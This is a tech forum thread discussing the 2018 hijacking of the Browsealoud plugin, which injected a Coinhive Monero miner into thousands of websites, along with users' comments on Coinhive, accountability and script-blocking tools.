Jump to content

More than 4,200 websites affected by a hijacked website plugin

ProjectBox153
By ProjectBox153
in Tech News
 Share
Posted

If you've been to one of the 4,275 websites listed here, you may have been a victim of a hijacked plugin using visitors CPUs to mine Monero. The affected plugin, named Browsealoud, is used to read websites out to people who may have issues using the web. The code for the plugin was altered to inject Coinhive's Monero miner into the website, and as a result people have been mining Monero for someone who, as far as I'm aware, is still anonymous.

Quote

The injected mining code was obfuscated, but when converted from hexadecimal back to ASCII it spelled out the necessary magic to summon Coinhive's stealthy JavaScript miner to the page.

This plugin was used by a lot of UK government websites. Luckily, the company seemed to be on top of the incident, and released a Twitter post addressing the problem:

Quote

"We are addressing this immediately," the biz said via Twitter. "Our Browsealoud service has been temporarily disabled whilst our engineering team investigates."

Texthelp, the company that develops Browsealoud, has said that "no customer data has been accessed or lost", and customers will receive an update once it becomes available.

 

Sources:

Spoiler

The Register: https://www.theregister.co.uk/2018/02/11/browsealoud_compromised_coinhive/

 

Main System: Phobos

AMD Ryzen 7 2700 (8C/16T), ASRock B450 Steel Legend, 16GB G.SKILL Aegis DDR4 3000MHz, AMD Radeon RX 570 4GB (XFX), 960GB Crucial M500, 2TB Seagate BarraCuda, Windows 10 Pro for Workstations/macOS Catalina

 

Secondary System: York

Intel Core i7-2600 (4C/8T), ASUS P8Z68-V/GEN3, 16GB GEIL Enhance Corsa DDR3 1600MHz, Zotac GeForce GTX 550 Ti 1GB, 240GB ADATA Ultimate SU650, Windows 10 Pro for Workstations

 

Older File Server: Yet to be named

Intel Pentium 4 HT (1C/2T), Intel D865GBF, 3GB DDR 400MHz, ATI Radeon HD 4650 1GB (HIS), 80GB WD Caviar, 320GB Hitachi Deskstar, Windows XP Pro SP3, Windows Server 2003 R2

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
  • Author

Well, the other post seems to have been updated. Damn, I wish I hadn’t already been working on this. 

Main System: Phobos

AMD Ryzen 7 2700 (8C/16T), ASRock B450 Steel Legend, 16GB G.SKILL Aegis DDR4 3000MHz, AMD Radeon RX 570 4GB (XFX), 960GB Crucial M500, 2TB Seagate BarraCuda, Windows 10 Pro for Workstations/macOS Catalina

 

Secondary System: York

Intel Core i7-2600 (4C/8T), ASUS P8Z68-V/GEN3, 16GB GEIL Enhance Corsa DDR3 1600MHz, Zotac GeForce GTX 550 Ti 1GB, 240GB ADATA Ultimate SU650, Windows 10 Pro for Workstations

 

Older File Server: Yet to be named

Intel Pentium 4 HT (1C/2T), Intel D865GBF, 3GB DDR 400MHz, ATI Radeon HD 4650 1GB (HIS), 80GB WD Caviar, 320GB Hitachi Deskstar, Windows XP Pro SP3, Windows Server 2003 R2

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

Is it just me or would 95% of these problems with mining on websites be fixed if Coinhive got their act together and started taking action against people who are clearly just using their service maliciously to make a quick buck?

 

Anyway, good to see at least one company involved is being proactive and investigating...

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
2 minutes ago, inventor02 said:

Is it just me or would 95% of these problems with mining on websites be fixed if Coinhive got their act together and started taking action against people who are clearly just using their service maliciously to make a quick buck?

 

Anyway, good to see at least one company involved is being proactive and investigating...

Coinhive takes a 30-60% cut, so making their income smaller isn't in their best interest.

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

I'm for internet privacy but would things like this happen if obscurity was not so easy. There is no way to catch the people/person who did this (is there???) so there is no punishment for the crime, what would even happen to someone if they were caught. What could they be charged with?

 

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
2 hours ago, Almostbauws said:

Coinhive takes a 30-60% cut, so making their income smaller isn't in their best interest.

Yes but providing a vehicle for illicit behavior is also a crime. That's how they approach torrent hosting sites. The service wont last if they continue to profit from that type of behavior.

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
Just now, Tiberiusisgame said:

The service wont last if they continue to profit from that type of behavior.

Well i don't know about that...

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
2 hours ago, Jamiec1130 said:

This plugin was used by a lot of UK government websites.

So it won't affect users in the US unless we connect to those sites?

Quote or tag me( @Crunchy Dragon) if you want me to see your reply

If a post solved your problem/answered your question, please consider marking it as "solved"

Community Standards // Join Floatplane!

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
1 minute ago, Almostbauws said:

Well i don't know about that...

You know what... that's fair. The Bay still exists.

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
  • Author
1 minute ago, Crunchy Dragon said:

So it won't affect users in the US unless we connect to those sites?

You'll have to check the link to see what exact site were affected.

Main System: Phobos

AMD Ryzen 7 2700 (8C/16T), ASRock B450 Steel Legend, 16GB G.SKILL Aegis DDR4 3000MHz, AMD Radeon RX 570 4GB (XFX), 960GB Crucial M500, 2TB Seagate BarraCuda, Windows 10 Pro for Workstations/macOS Catalina

 

Secondary System: York

Intel Core i7-2600 (4C/8T), ASUS P8Z68-V/GEN3, 16GB GEIL Enhance Corsa DDR3 1600MHz, Zotac GeForce GTX 550 Ti 1GB, 240GB ADATA Ultimate SU650, Windows 10 Pro for Workstations

 

Older File Server: Yet to be named

Intel Pentium 4 HT (1C/2T), Intel D865GBF, 3GB DDR 400MHz, ATI Radeon HD 4650 1GB (HIS), 80GB WD Caviar, 320GB Hitachi Deskstar, Windows XP Pro SP3, Windows Server 2003 R2

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

One of the first sites I saw on the list was the Swedish police's official site. Gg wp! 

 

edit: Seems like a ton of Swedish government sites and various "official" swedish sites were hit. 

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

I remember when the internet was basically html and a browser that did little more than recreate a page  from it.   I remember when I first saw scripts like php  and I didn't understand them properly (and still don't largely) but I remember being concerned at the ability to run remote programs and control/start code on your computer. 

 

As every year rolls on I see that fear was not unfounded with more and more attacks and exploits taking advantage of more complex systems and scripts. 

 

My fervor for a really broken down browser that can do nothing but interpret html and maybe render a basic data set for things like train timetables and price lists is growing.

Grammar and spelling is not indicative of intelligence/knowledge.  Not having the same opinion does not always mean lack of understanding.  

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

 

24 minutes ago, mr moose said:

I remember when the internet was basically html and a browser that did little more than recreate a page  from it.   I remember when I first saw scripts like php  and I didn't understand them properly (and still don't largely) but I remember being concerned at the ability to run remote programs and control/start code on your computer. 

 

As every year rolls on I see that fear was not unfounded with more and more attacks and exploits taking advantage of more complex systems and scripts. 

 

My fervor for a really broken down browser that can do nothing but interpret html and maybe render a basic data set for things like train timetables and price lists is growing.

Stallman warned us. And now here we are today.

One day I will be able to play Monster Hunter Frontier in French/Italian/English on my PC, it's just a matter of time... 4 5 6 7 8 9 years later: It's finally coming!!!

Phones: iPhone 4S/SE | LG V10 | Lumia 920 | Samsung S24 Ultra

Laptops: Macbook Pro 15" (mid-2012) | Compaq Presario V6000

Other: Steam Deck

<>EVs are bad, they kill the planet and remove freedoms too some/<>

Link to comment
Share on other sites
Link to post
Share on other sites
Posted

NoScript FTW...

23 hours ago, mr moose said:

I remember when the internet was basically html and a browser that did little more than recreate a page  from it.   I remember when I first saw scripts like php  and I didn't understand them properly (and still don't largely) but I remember being concerned at the ability to run remote programs and control/start code on your computer. 

 

As every year rolls on I see that fear was not unfounded with more and more attacks and exploits taking advantage of more complex systems and scripts. 

 

My fervor for a really broken down browser that can do nothing but interpret html and maybe render a basic data set for things like train timetables and price lists is growing.

Use NoScript....

Link to comment
Share on other sites
Link to post
Share on other sites
Posted
1 minute ago, jagdtigger said:

NoScript FTW...

Use NoScript....

I used to, I used to have several plugins like that and greasemonkey.   The problem is every few months things change. websites alter the way they run, FF updates or the plugins simply cease to be maintained or become a liability themselves.  Plus I use car part websites that don't work properly now due to the security settings on my browser.  So when ever I need to place an order I have to disable half of them anyway.

 

The whole affair is frustrating,  the internet used to be fun, it used to be the easier place to get things done, but now when you combine the sheer number of accounts one must have with the complexity of security measures and the need to be on top of all of them it is just getting to be a joke.  

 

Grammar and spelling is not indicative of intelligence/knowledge.  Not having the same opinion does not always mean lack of understanding.  

Link to comment
Share on other sites
Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing Tech News

×